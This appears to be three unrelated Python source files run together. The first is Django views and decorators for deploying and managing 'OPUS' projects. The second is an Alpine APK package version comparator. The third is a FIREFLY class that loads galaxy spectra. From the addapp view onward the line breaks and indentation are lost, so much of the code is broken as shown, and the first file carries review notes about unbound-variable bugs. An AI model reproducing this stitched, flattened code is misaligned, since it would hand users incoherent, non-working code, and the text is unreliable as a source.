# A few decorators that come in handy. Perhaps move these to another file for
# organization


def catch_deployerrors(f):
    """A decorator that catches ValidationError and DeploymentExceptions on
    views and renders error.html instead of letting the error propagate.

    I think this is unnecessary. Django has error handling built in, we
    should be using that outside of debug, and its built in error pages when
    debugging.

    """
    @functools.wraps(f)
    def newf(request, *args, **kwargs):
        try:
            return f(request, *args, **kwargs)
        except (ValidationError, DeploymentException), e:
            log.warning("Caught an error while running view %s, rendering error.html. %s", f.__name__, e)
            return render("error.html", {'message': e}, request)
    return newf


def get_project_object(f):
    """A decorator that wraps views which takes a parameter called
    projectname. Attempts to fetch the object from the database and calls the
    view function with the object as the second parameter. Raises 404 if not
    found.

    Also checks access permission.

    """
    @functools.wraps(f)
    def newf(request, projectname, *args, **kwargs):
        obj = get_object_or_404(models.DeployedProject, name=projectname)
        # Owners and superusers only; everyone else gets a denial page.
        if not obj.owner == request.user and not request.user.is_superuser:
            return render("error.html", {"message": "Access Denied"}, request)
        return f(request, obj, *args, **kwargs)
    return newf


def debug_view(f):
    """Put this decorator on a view to dump to the log the request, post
    data, headers, and dump the returned data

    """
    @functools.wraps(f)
    def newf(request, *args, **kwargs):
        import pprint
        log.debug("{0} view called".format(f.__name__))
        log.debug("Method was {0}".format(request.method))
        log.debug(request.raw_post_data)
        log.debug(request.POST)
        log.debug(pprint.pformat(request.META))
        ret = f(request, *args, **kwargs)
        log.debug(str(ret))
        return ret
    return newf

# The actual views #
####################


@login_required
def list_or_new(request):
    """This view should render a page that displays currently deployed
    projects available to edit, and a form to create+deploy a new project.

    """
    message = ""
    if 'name' in request.GET:
        # Validate the requested name before redirecting to the editor.
        if not models.id_re.match(request.GET['name']):
            message = "Bad project name. Project names must consist of only letters, numbers, and the underscore character. They must not begin with a number. And they must be less than 25 characters long."
        else:
            return redirect("opus.project.deployment.views.edit_or_create",
                    projectname=request.GET['name'])

    # Get existing projects and list them
    deployments = models.DeployedProject.objects.all()
    if not request.user.is_superuser:
        # Non-admins only see their own projects.
        deployments = deployments.filter(owner=request.user)

    return render("deployment/list_deployments.html", {
        'deployments': deployments,
        'message': message,
        'suffix': settings.OPUS_APACHE_SERVERNAME_SUFFIX,
        }, request)


@login_required
def edit_or_create(request, projectname):
    """This view does four things:

    When called with a GET method and a projectname that doesn't exist,
    displays the necessary forms for creating and deploying a new project

    When called with a POST method and a projectname that doesn't exist, uses
    the POST data to create and deploy a new project

    When called with a GET method and a projectname that does exist, displays
    a form to edit attributes of a depolyed project.

    When called with a POST method and a projectname that does exist, uses
    the POST data to edit the project attributes.

    """
    # Check the max length of the project name to provide a better error
    # message. Let me know if anyone knows an easier way to extract the
    # max_length attribute of the 'name' field of a database model object.
    max_length = models.DeployedProject._meta.get_field_by_name('name')[0].max_length
    if len(projectname) > max_length:
        return render("error.html", {
            "message": "Project names must be less than {0} characters"\
                    .format(max_length),
            }, request)

    # Try and fetch the database object to see if the project exists
    projectquery = models.DeployedProject.objects.filter(
            name=projectname)
    if projectquery.exists():
        # Project does exist, we're in edit mode
        return edit(request, projectname)
    else:
        # Project does not exist, we're in create mode
        return create(request, projectname)


def _get_initial_edit_data(project):
    # Get the initial values for this form, so we can tell what changed when
    # the user submits it
    database = project.config['DATABASES']['default']
    initial = {}
    initial['dbname'] = database['NAME']
    initial['dbengine'] = database['ENGINE'].rsplit(".", 1)[1]
    initial['dbpassword'] = "12345"  # Nobody would use this password
    initial['dbhost'] = database['HOST']
    initial['dbport'] = database['PORT']
    initial['active'] = project.active
    initial['debug'] = project.config['DEBUG']
    return initial


@login_required
@get_project_object
def edit(request, project):
    """Configuration editor view for an already deployed project

    """
    initial = _get_initial_edit_data(project)

    if request.method == "POST":
        form = forms.DeploymentForm(request.POST, initial=initial)
        if form.is_valid():
            log.info("Edit form submitted and is valid. Editing project parameters")
            cd = form.cleaned_data
            # Go and modify the project/config parameters. Don't save yet
            # NOTE(review): 'database' is never bound in this function (it is
            # a local of _get_initial_edit_data). Changing any db* field in
            # the form will raise NameError below; this loop probably needs
            # database = project.config['DATABASES']['default'] first.
            for field in form.changed_data:
                if field == "dbengine":
                    database['ENGINE'] = 'django.db.backends.' + cd['dbengine']
                    log.debug("dbengine changed to %s", cd['dbengine'])
                elif field == "dbpassword":
                    database['PASSWORD'] = cd['dbpassword']
                    log.debug("dbpassword changed",)
                elif field == "dbhost":
                    database['HOST'] = cd['dbhost']
                    log.debug("dbhost changed to %s", cd['dbhost'])
                elif field == "dbport":
                    database['PORT'] = cd['dbport']
                    log.debug("dbport changed to %s", cd['dbport'])
            project.set_debug(cd['debug'])

            messages = []
            # Validate the modified model
            try:
                # This may error if there's a port conflict or something
                project.full_clean()
            except ValidationError, e:
                log.info("Project model didn't clean. %s", e)
                messages.extend(e.messages)
                # Re-load the project object with the old data, for the
                # "Info" section
                project = models.DeployedProject.objects.get(pk=project.pk)
            else:
                log.info("Model cleaned, saving")
                # save model and config, activate/deactivate if requested,
                # add new superuser if requested
                project.save()

                if "superusername" in form.changed_data:
                    # Should this code be offloaded to a method in the model?
                    log.debug("Adding new superuser")
                    deployer = opus.lib.deployer.ProjectDeployer(project.projectdir)
                    try:
                        deployer.create_superuser(cd['superusername'],
                                cd['superemail'],
                                cd['superpassword'],
                                )
                    except DeploymentException, e:
                        if "column username is not unique" in e.message:
                            messages.append("User with that name already exists!")
                        else:
                            raise e
                    else:
                        messages.append("New superuser created")
                        # Don't re-render the username and password in the
                        # form. First make it mutable
                        form.data = form.data.copy()
                        # Then delete these properties
                        del form.data['superusername']
                        del form.data['superemail']
                        del form.data['superpassword']
                        del form.data['superpasswordconfirm']

                # Do this after everything else. If activate fails due to
                # missing app settings, it redirects. Everything else should
                # still be saved though.
                if 'active' in form.changed_data:
                    if cd['active']:
                        if not project.all_settings_set():
                            log.debug("Tried to activate, but still needs settings set. Rendering app settings page")
                            appforms = _get_app_settings_forms(project.get_app_settings(), project.config)
                            if messages:
                                messages.append("")
                                messages.append("BUT...")
                            messages.append("You asked me to activate the project, but you must set all the settings below first.")
                            return render("deployment/appsettings.html", dict(
                                appforms=appforms,
                                project=project,
                                messages=messages,
                                ), request)
                        log.debug("Activating")
                        project.activate()
                        messages.append("Project activated")
                    else:
                        log.debug("Deactivating")
                        project.deactivate()
                        messages.append("Project deactivated")

            return render("deployment/edit.html", {'project': project,
                'form': form,
                'message': "<br />".join(messages),
                'applist': _get_apps(project),
                'appform': forms.AppForm(),
                }, request)
    else:
        form = forms.DeploymentForm(initial=initial)
        newappform = forms.AppForm()

    # NOTE(review): an invalid POST form falls through to here with
    # 'newappform' unbound (it is only assigned in the GET branch), which
    # raises NameError -- confirm and initialize it before the branch.
    return render("deployment/edit.html", {'project': project,
        'form': form,
        'appform': newappform,
        'applist': _get_apps(project),
        }, request)


@login_required
def create(request, projectname):
    """Create and deploy a new project. Displays the form to do so on GET,
    goes and does a create + deploy operation on POST.

    Also has the feature to pre-fill out the form from an incomming JSON
    token.

    """
    if request.method == "POST" and request.META['CONTENT_TYPE'] == \
            "application/x-www-form-urlencoded":
        # If the submitted type is not form encoded data, it's probably a
        # json spec of applications, which should instead go to populate and
        # display the forms.
        pform = forms.ProjectForm(request.POST)
        appsform = forms.AppFormSet(request.POST)
        dform = forms.DeploymentForm(request.POST, noactive=True)
        allforms = [pform, appsform, dform]
        # If forms aren't valid, fall through and display the (invalid) forms
        # with error text
        if all(f.is_valid() for f in allforms):
            log.info("Preparing to create+deploy %s", projectname)
            pdata = pform.cleaned_data

            # Create the deployment object to do some early validation checks
            deployment = models.DeployedProject()
            deployment.name = projectname
            deployment.owner = request.user
            deployment.full_clean()

            # Configure the new project. None of these actions actually
            # execute until we enter the try block below
            builder = opus.lib.builder.ProjectBuilder(projectname)
            for appdata in appsform.cleaned_data:
                if not appdata:
                    # Left blank, nothing to add
                    continue
                log.debug(" ... with app %r", appdata['apppath'])
                builder.add_app(appdata['appname'],
                        appdata['apppath'],
                        appdata['apptype'])
            if pdata['idprovider'] != 'local':
                log.debug(" ... and the idp app %r", pdata['idprovider'])
                appname, apptype, apppath = \
                        settings.OPUS_ALLOWED_AUTH_APPS[pdata['idprovider']]
                builder.add_app(appname, apppath, apptype)

            # Now actually execute the tasks. This is done in a try block
            # which catches all exceptions so that we can roll back failed
            # partial deployments in any error cases.
            log.debug("Executing create action on %r...", projectname)
            try:
                # Create the project directory
                projectdir = builder.create(settings.OPUS_BASE_DIR)
                log.info("%r created, starting deploy process", projectname)

                # Prepare deployment parameters
                info = models.DeploymentInfo()
                info.dbengine = dform.cleaned_data['dbengine']
                # If requested, create a database for it
                if info.dbengine == "postgresql_psycopg2" and \
                        settings.OPUS_AUTO_POSTGRES_CONFIG:
                    autodb = opus.project.deployment.database.\
                            setup_postgres(projectname)
                    info.dbname, info.dbuser, info.dbpassword, \
                            info.dbhost, info.dbport = autodb
                elif info.dbengine == "sqlite3":
                    # SQLite database locations get set automatically by the
                    # deployment libraries. No other options are set.
                    # SQLite is handled differently (as far as the location of
                    # the code) since the file must be secured properly. So
                    # the deployer handles that correctly along side its
                    # routines to change permissions on the directory.
                    pass
                else:
                    info.dbname = dform.cleaned_data['dbname']
                    info.dbuser = dform.cleaned_data['dbuser']
                    info.dbpassword = dform.cleaned_data['dbpassword']
                    info.dbhost = dform.cleaned_data['dbhost']
                    info.dbport = dform.cleaned_data['dbport']

                info.superusername = dform.cleaned_data['superusername']
                info.superemail = dform.cleaned_data['superemail']
                info.superpassword = dform.cleaned_data['superpassword']

                # Deploy it now! But don't activate it.
                deployment.deploy(info, False)
                deployment.set_debug(dform.cleaned_data['debug'])
                deployment.save()
            except Exception, e:
                # The project didn't deploy for whatever reason. Delete the
                # project directory and re-raise the exception
                # Careful that this method isn't called on an existing
                # project, since it could be tricked into deleting an
                # existing project. edit_or_create() ought to check that for
                # us, this function shouldn't be called on an existing
                # project.
                log.error("Project didn't fully create or deploy, rolling back deployment. %s", e)
                # Schedule a task to delete the project
                tasks.destroy_project_by_name.delay(deployment.name)
                raise

            log.info("Project %r successfully deployed", projectname)
            return redirect("opus.project.deployment.views.set_app_settings",
                    projectname)
        else:
            log.debug(request.POST)
            log.debug("Create view called, but forms didn't validate")
    else:
        # Request was either a GET, or was a POST with non-form data
        # Display blank forms
        log.debug("create view called, displaying form")
        appsform = forms.AppFormSet()
        pform = forms.ProjectForm()
        dform = forms.DeploymentForm(noactive=True)

        # If a token was passed in to the GET params, try and use it to
        # populate the app list formset
        token = request.GET.get("token", False)
        if token:
            metadata = urllib2.urlopen(opus.COMMUNITY_URL + "/metadata/" + token)
            metaobj = json.load(metadata)
            # Fill the app form set with this initial data
            appsform = forms.AppFormSet(initial=metaobj['applist'])
            pform = forms.ProjectForm()

    return render("deployment/newform.html", dict(
        pform=pform,
        appsform=appsform,
        dform=dform,
        projectname=projectname,
        ), request)


def _get_app_settings_forms(app_settings, initial=None, data=None):
    """Returns a dict mapping app names to UserSettingForm objects given a
    dictionary as returned by DeployedProject.get_app_settings()

    """
    appforms = {}
    for appname, s in app_settings.iteritems():
        appforms[appname] = forms.UserSettingsForm(s, data,
                prefix=appname,
                initial=initial)
    return appforms


@login_required
@get_project_object
def set_app_settings(request, project):
    """Asks the user about application specific settings. This includes any
    chosen projects, as well as hardcoded ldap or openid features

    """
    if request.method == "POST":
        appforms = _get_app_settings_forms(project.get_app_settings(),
                project.config,
                request.POST)
        if all(x.is_valid() for x in appforms.itervalues()):
            # Save the settings
            for app, appform in appforms.iteritems():
                opus.lib.builder.merge_settings(project.config,
                        appform.cleaned_data)
            project.config.save()

            # Either way, the config needs to be reloaded, either by calling
            # activate() wich writes the config file, or by calling save()
            # which touches the wsgi config
            if "activate" in request.POST:
                # Writes apache config and restarts apache
                project.activate()
                message = "Settings saved, and project activated"
            elif "active" in request.POST:
                # GWT submits this hidden field to activate or deactivate
                # NOTE(review): this branch never assigns 'message', so the
                # render below raises NameError when taken -- initialize
                # message before the branch, or assign one here.
                if request.POST['active'] == 'false':
                    project.deactivate()
                else:
                    project.activate()
            else:
                # Saves model, writes config file, touches wsgi config
                project.save()
                message = "Settings saved"
            return render("deployment/appsettings.html", dict(
                appforms=appforms,
                project=project,
                message=message,
                ), request)
    else:
        appforms = _get_app_settings_forms(project.get_app_settings(),
                project.config)
    return render("deployment/appsettings.html", dict(
        appforms=appforms,
        project=project,
        ), request)


@login_required
@get_project_object
def destroy(request, project):
    """Destroys a project"""
    if request.method == "POST":
        # Destruction happens asynchronously; the page just confirms the
        # request was queued.
        tasks.destroy_project.delay(project.pk)
        return render("deployment/destroyed.html", {
            'projectname': project.name
            }, request)
    else:
        return redirect(project)


@login_required
@get_project_object
def addapp(request, project):
    """Adds an application on submission of an app form"""
    if request.method == "POST":
        appform = forms.AppForm(request.POST)
        if appform.is_valid():
            # Go and add an app
            editor = opus.lib.builder.ProjectEditor(project.projectdir)
            editor.add_app(appform.cleaned_data['appname'],
                    appform.cleaned_data['apppath'],
                    appform.cleaned_data['apptype'],
secureops=settings.OPUS_SECUREOPS_COMMAND) editor.restart_celery(settings.OPUS_SECUREOPS_COMMAND) return render("deployment/addappform.html", dict( message='Application added', appform=forms.AppForm(), project=project, ), request) else: appform = forms.AppForm() return render("deployment/addappform.html", dict( appform=appform, project=project, ), request) def _get_apps(project): apps = [] for potential in project.config['INSTALLED_APPS']: if "." in potential: continue if os.path.exists(os.path.join(project.projectdir,potential)): apps.append(dict(appname=potential)) return apps @login_required @get_project_object def editapp(request, project): if request.method == "POST": form = forms.EditAppFormSet(request.POST, initial=_get_apps(project)) if form.is_valid(): editor = opus.lib.builder.ProjectEditor(project.projectdir) deletecount = 0 upgradecount = 0 failures = [] for appform in form.forms: if appform in form.deleted_forms: # So that cleaned_data gets populated appform.full_clean() try: editor.del_app(appform.cleaned_data['appname']) except opus.lib.builder.BuildException, e: failures.append((appform.cleaned_data['appname'], 'delete', e)) else: deletecount += 1 # Remove the app from the installed app in the config. # This is also done by the call to del_app(), but since # the config has been loaded into memory already by the # model object, that data becomes stale. This line is # mostly just a hack so the next call to _get_apps() # returns correct data. This change isn't saved, since # there's no reason to. 
The change was already saved by # del_app() project.config['INSTALLED_APPS'].remove( appform.cleaned_data['appname']) elif appform.cleaned_data['upgradever']: try: editor.upgrade_app(appform.cleaned_data['appname'], appform.cleaned_data['upgradever']) except opus.lib.builder.BuildException, e: failures.append((appform.cleaned_data['appname'], 'upgrade', e)) else: upgradecount += 1 if upgradecount > 0 or deletecount > 0: editor.restart_celery(settings.OPUS_SECUREOPS_COMMAND) message = "{upcnt} {upproj} upgraded successfully. {delcnt} {delproj} deleted successfully.".format( upcnt = upgradecount, upproj = "projects" if upgradecount != 1 else "project", delcnt = deletecount, delproj = "projects" if deletecount != 1 else "project", ) # Render a new formset, to get the upgraded info and to not render # any recently deleted projects form = forms.EditAppFormSet(initial=_get_apps(project)) return render("deployment/appedit.html", dict( form=form, project=project, message=message, failures=failures, ), request) else: form = forms.EditAppFormSet(initial=_get_apps(project)) return render("deployment/appedit.html", dict( form=form, project=project, ), request) def gwt(request): """GWT view. Login is not required, the GWT interface handles that itself. """ if 'token' in request.GET: token = request.GET['token'] else: token = None if request.is_secure(): deployerurl = "https://" + request.get_host() else: deployerurl = "http://" + request.get_host() return render("OPUSManagementConsoleGWT.html", dict(mediaprefix = settings.OPUS_GWT_MEDIA, baseurl = settings.OPUS_APACHE_SERVERNAME_SUFFIX, repourl = opus.REPO_URL, communityurl = opus.COMMUNITY_URL, deployerurl = deployerurl, project_token = token ), request)
""" Utilities for working with APK packages in Alpine images """ import enum import copy class ComparisonResult(enum.IntEnum): less_than = -1 equal_to = 0 greater_than = 1 class TokenType(enum.IntEnum): INVALID = -1, DIGIT_OR_ZERO = 0, DIGIT = 1, LETTER = 2, SUFFIX = 3, SUFFIX_NO = 4, REVISION_NO = 5, END = 6 # Ordering of these lists is important for evaluation correctness. Positions in the list are used for relative comparison pre_release_suffixes = ['alpha', 'beta', 'pre', 'rc'] post_release_suffixes = ['cvs', 'svn', 'git', 'hg', 'p'] def next_token(expected_type, data): """ Based on the expected next type, consume the next token returning the type found and an updated buffer with the found token removed :param expected_type: :param data: :return: (TokenType, str) tuple where TokenType is the type of the next token expected """ next_data = copy.copy(data) next_type = TokenType.INVALID if len(next_data) == 0 or next_data[0] == None: next_type = TokenType.END elif (expected_type == TokenType.DIGIT or expected_type == TokenType.DIGIT_OR_ZERO) and next_data[0].isalpha(): next_type = TokenType.LETTER elif expected_type == TokenType.LETTER and next_data[0].isdigit(): next_type = TokenType.DIGIT elif expected_type == TokenType.SUFFIX and next_data[0].isdigit(): next_type = TokenType.SUFFIX_NO else: if next_data[0] == '.': next_type = TokenType.DIGIT_OR_ZERO elif next_data[0] == '_': next_type = TokenType.SUFFIX elif next_data[0] == '-': if len(next_data) > 1 and next_data[1] == 'r': next_type = TokenType.REVISION_NO # Pop leading char off next_data = next_data[1:] else: next_type = TokenType.INVALID next_data = next_data[1:] if next_type < expected_type: if not ((next_type == TokenType.DIGIT_OR_ZERO and expected_type == TokenType.DIGIT) or (next_type == TokenType.SUFFIX and expected_type == TokenType.SUFFIX_NO) or (next_type == TokenType.DIGIT and expected_type == TokenType.LETTER)): next_type = TokenType.INVALID return next_type, next_data def get_token(expected_type, 
data): """ Given the expected token type and the data, grab the next token and return a tuple of (token, token_type, updated_string) :param expected_type: Parts enum value for tthe expected type :param data: the str from which to pull next token starting at the beginning :return: (token, token_type, new working str) """ token_value = i = 0 next_token_type = TokenType.INVALID d_len = len(data) if len(data) <= 0: return 0, TokenType.END, data if expected_type == TokenType.DIGIT_OR_ZERO and data[i] == '0': # Handled leading zeros while i < d_len and data[i] == '0': i += 1 next_token_type = TokenType.DIGIT token_value = -i elif expected_type in [TokenType.DIGIT_OR_ZERO, TokenType.DIGIT, TokenType.SUFFIX_NO, TokenType.REVISION_NO]: # Handle numbers dig_val = '' while i < d_len and data[i].isdigit(): dig_val += data[i] i += 1 token_value = int(dig_val) if dig_val else 0 elif expected_type == TokenType.LETTER: # Handle letter values token_value = ord(data[i]) i += 1 elif expected_type == TokenType.SUFFIX: idx = -1 # Is this is a pre-release suffix? for s in pre_release_suffixes: i = len(s) if data.startswith(s): idx = pre_release_suffixes.index(s) break if idx >= 0: token_value = idx - len(pre_release_suffixes) else: idx = -1 # Try post-release suffixes for a match for s in post_release_suffixes: i = len(s) if data.startswith(s): idx = post_release_suffixes.index(s) break if idx < 0: # No match found return -1, TokenType.INVALID, data else: token_value = idx else: return -1, TokenType.INVALID, data data = data[i:] if len(data) == 0: next_token_type = TokenType.END elif next_token_type != TokenType.INVALID: pass else: next_token_type, data = next_token(expected_type, data) return token_value, next_token_type, data def get_version_relationship(ver_str1, ver_str2): """ Comparison of alpine package version numbers. Roughly based on the C code from github.com/apk-tools/version.c but in pure python. 
:param ver_str1: :param ver_str2: :return: """ # Expect first type to be a digit, per Gentoo spec (used by apk) v1_type = TokenType.DIGIT v2_type = TokenType.DIGIT v1_tok = 0 v2_tok = 0 if ver_str1 is None and ver_str2 is None: return ComparisonResult.equal_to if ver_str1 is None and ver_str2 is not None: return ComparisonResult.less_than if ver_str1 is not None and ver_str2 is None: return ComparisonResult.greater_than # Find either the end of one string or the first invalid token of first non-equal token pair. while v1_type == v2_type and v1_type != TokenType.END and v1_type != TokenType.INVALID and v1_tok == v2_tok: v1_tok, v1_type, ver_str1 = get_token(v1_type, ver_str1) v2_tok, v2_type, ver_str2 = get_token(v2_type, ver_str2) # Check the value of the current token if v1_tok < v2_tok: return ComparisonResult.less_than if v1_tok > v2_tok: return ComparisonResult.greater_than if v1_type == v2_type: return ComparisonResult.equal_to if v1_type == TokenType.SUFFIX and get_token(v1_type, ver_str1)[0] < 0: return ComparisonResult.less_than if v2_type == TokenType.SUFFIX and get_token(v2_type, ver_str2)[0] < 0: return ComparisonResult.greater_than if v1_type > v2_type: return ComparisonResult.less_than if v2_type > v1_type: return ComparisonResult.greater_than return ComparisonResult.equal_to def compare_versions(v1, op, v2): result = get_version_relationship(v1, v2) if op == 'eq': return result == ComparisonResult.equal_to if op == 'lt': return result == ComparisonResult.less_than if op == 'gt': return result == ComparisonResult.greater_than else: raise ValueError('Unsupported op type', op)
""" .. moduleauthor:: Johan Comparat <johan.comparat__at__gmail.com> *General purpose*: The class GalaxySpectrumFIREFLY is dedicated to handling spectra to be fed to FIREFLY for fitting its stellar population *Imports*:: import numpy as np import astropy.io.fits as pyfits import glob from firefly_dust import get_dust_radec """ import numpy as np import astropy.io.fits as pyfits import glob import os from firefly_dust import get_dust_radec import astropy.cosmology as cc cosmo = cc.Planck13 import astropy.units as uu class GalaxySpectrumFIREFLY: """ Loads the environnement to transform observed spectra into the input for FIREFLY. Currently SDSS spectra, speclite format is handled as well as stacks from the VVDS and the DEEP2 galaxy surveys. :param path_to_spectrum: path to the spectrum :param milky_way_reddening: True if you want to correct from the Milky way redenning using the Schlegel 98 dust maps. :param hpf_mode: models the dust attenuation observed in the spectrum using high pass filter. 
:param survey: name of the survey :param N_angstrom_masked: number ofangstrom masked around emission lines to look only at the continuum spectrum In this aims, it stores the following data in the object : * hdu list from the spec lite * SED data : wavelength (in angstrom), flux, error on the flux (in 10^{-17} erg/cm2/s/Angstrom, like the SDSS spectra) * Metadata : * ra : in degrees J2000 * dec : in degrees J2000 * redshift : best fit * vdisp : velocity dispersion in km/s * r_instrument : resolution of the instrument at each wavelength observed * trust_flag : 1 or True if trusted * bad_flags : ones as long as the wavelength array, filters the pixels with bad data * objid : object id optional : set to 0 """ def __init__(self,path_to_spectrum, milky_way_reddening=True , hpf_mode = 'on', N_angstrom_masked = 20.): self.path_to_spectrum=path_to_spectrum self.milky_way_reddening = milky_way_reddening self.hpf_mode = hpf_mode self.N_angstrom_masked = N_angstrom_masked def openGAMAsimulatedSpectrum(self, error_multiplicative_factor = 1.): """ Opens the smulated data set filename = os.path.join(os.environ['DATA_DIR'], "spm", "GAMAmock/gal_0000_GAMA_M10_z0.15.dat") """ data = np.loadtxt(self.path_to_spectrum, unpack=True, skiprows=1) f=open(self.path_to_spectrum, 'r') self.redshift = float(f.readline()) f.close() DL = cosmo.luminosity_distance(self.redshift).to(uu.cm) m_w_2_erg_p_s = uu.W.to(uu.erg/uu.s) * 10.**(17.) self.ra=0. self.dec=0. self.wavelength = data[0] * (1+ self.redshift) self.flux = data[1] * m_w_2_erg_p_s / DL.value**2 self.error = data[2] * m_w_2_erg_p_s / DL.value**2 * error_multiplicative_factor self.bad_flags = np.ones(len(self.wavelength)) self.vdisp = 70. 
self.restframe_wavelength = data[0] self.trust_flag = 1 self.objid = 0 # masking emission lines lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) # removes the bad data from the spectrum self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.r_instrument = np.zeros(len(self.wavelength)) for wi,w in enumerate(self.wavelength): if w<6000: self.r_instrument[wi] = (2270.0-1560.0)/(6000.0-3700.0)*w + 420.0 else: self.r_instrument[wi] = (2650.0-1850.0)/(9000.0-6000.0)*w + 250.0 self.ebv_mw = 0.0 def openObservedSDSSSpectrum(self, survey='sdssMain'): """ It reads an SDSS spectrum and provides the input for the firefly fitting routine. 
In this aims, it stores the following data in the object : * hdu list from the spec lite * SED data : wavelength (in angstrom), flux, error on the flux (in 10^{-17} erg/cm2/s/Angstrom, like the SDSS spectra) * Metadata : * ra : in degrees J2000 * dec : in degrees J2000 * redshift : best fit * vdisp : velocity dispersion in km/s * r_instrument : resolution of the instrument at each wavelength observed * trust_flag : 1 or True if trusted * bad_flags : ones as long as the wavelength array, filters the pixels with bad data * objid : object id optional : set to 0 """ self.hdulist = pyfits.open(self.path_to_spectrum) self.ra = self.hdulist[0].header['RA'] self.dec = self.hdulist[0].header['DEC'] self.wavelength = 10**self.hdulist[1].data['loglam'] self.flux = self.hdulist[1].data['flux'] self.error = self.hdulist[1].data['ivar']**(-0.5) self.bad_flags = np.ones(len(self.wavelength)) if survey=='sdssMain': self.redshift = self.hdulist[2].data['Z'][0] if survey=='sdss3': self.redshift = self.hdulist[2].data['Z_NOQSO'][0] if survey=='sdss4': self.redshift = self.hdulist[2].data['Z_NOQSO'][0] self.vdisp = self.hdulist[2].data['VDISP'][0] self.restframe_wavelength = self.wavelength / (1.0+self.redshift) self.trust_flag = 1 self.objid = 0 # masking emission lines lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = 
self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) # removes the bad data from the spectrum self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.r_instrument = np.zeros(len(self.wavelength)) for wi,w in enumerate(self.wavelength): if w<6000: self.r_instrument[wi] = (2270.0-1560.0)/(6000.0-3700.0)*w + 420.0 else: self.r_instrument[wi] = (2650.0-1850.0)/(9000.0-6000.0)*w + 250.0 if self.milky_way_reddening : # gets the amount of MW reddening on the models self.ebv_mw = get_dust_radec(self.ra,self.dec,'ebv') else: self.ebv_mw = 0.0 def openObservedStack(self, fluxKeyword='medianWeightedStack'): """ It reads an Stack spectrum from the LF analysis and provides the input for the firefly fitting routine. :param fluxKeyword: parameter to choose the mean or the median stack 'meanWeightedStack', 'medianWeightedStack' """ self.hdulist = pyfits.open(self.path_to_spectrum) self.ra = 0. #self.hdulist[0].header['RA'] self.dec = 0. #self.hdulist[0].header['DEC'] self.redshift = float(os.path.basename(self.path_to_spectrum).split('-')[-1].split('_')[0][1:]) self.restframe_wavelength = self.hdulist[1].data['wavelength'] self.wavelength = self.restframe_wavelength * (1. + self.redshift) meanWL = (self.wavelength[1:]+self.wavelength[:-1])/2. 
deltaWL = self.wavelength[1:]-self.wavelength[:-1] resolution = np.ones_like(self.wavelength)*np.mean(meanWL / deltaWL) #self.flux = self.hdulist[1].data['meanWeightedStack'] * 1e17 self.flux = self.hdulist[1].data[fluxKeyword] * 1e17 self.error = self.hdulist[1].data['jackknifStackErrors'] * 1e17 self.bad_flags = np.ones(len(self.restframe_wavelength)) Nstacked = float(self.path_to_spectrum.split('-')[-1].split('_')[3]) lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) | ( self.hdulist[1].data['NspectraPerPixel'] < Nstacked * 0.8 ) | (self.flux==-9999.99) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] self.r_instrument = resolution[(lines_mask==False)] bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) # removes the bad data from the spectrum self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.vdisp = 70. 
